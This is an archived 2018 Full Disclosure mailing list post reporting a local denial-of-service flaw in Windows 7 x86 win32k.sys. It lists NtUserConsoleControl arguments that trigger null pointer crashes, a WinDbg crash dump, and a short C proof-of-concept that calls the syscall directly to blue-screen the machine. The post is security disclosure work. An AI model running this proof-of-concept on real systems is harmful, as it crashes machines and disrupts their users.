[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Windows Kernel (win32k.sys) Local Denial Of Service
From: Victor Portal Gonzalez <vportalg () gmail ! com>
Date: 2018-06-29 10:42:00
Message-ID: CAA1qehzzYhWDT-_-5NyDXtDm-nPgSOWSmojU=2GBXw_rbHwb-A () mail ! gmail ! com
[Download RAW message or body]
Hello,
It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:
- NtUserControlConsole(1,0,8).
- NtUserControlConsole(4,0,8).
- NtUserControlConsole(6,0,12).
- NtUserControlConsole(2,0,12).
- NtUserControlConsole(3,0,20).
- NtUserControlConsole(5,0,8).
Different crashes are reproduced for each case. For the second case the
crash is showed below:
*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]TRAP_FRAME: 8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nccs=0008
ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
*0xc:93310641 8b0e mov ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULTBUGCHECK_STR: 0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL: 0LAST_CONTROL_TRANSFER: from 9330fc27 to
93310641STACK_TEXT: 8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*
*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*
*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND: kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME: win32k!xxxSetConsoleCaretInfo+*
*cFOLLOWUP_NAME: MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP: 5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*
*xxxSetConsoleCaretInfo+cBUCKET_ID: 0x8E_win32k!*
*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*
*PoC code:*
*#include <Windows.h>*
*extern "C"*
*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*
* __asm{mov eax, ApiNumber};*
* __asm{lea edx, ApiNumber + 4};*
* __asm{int 0x2e};*
*}*
*int _tmain(int argc, _TCHAR* argv[])*
*{*
* int st = 0;*
* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*
*LoadLibrary(L"user32.dll");*
* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*
* return 0;*
*}*
The vulnerability has only been tested in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.
Best regards,
Victor Portal
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic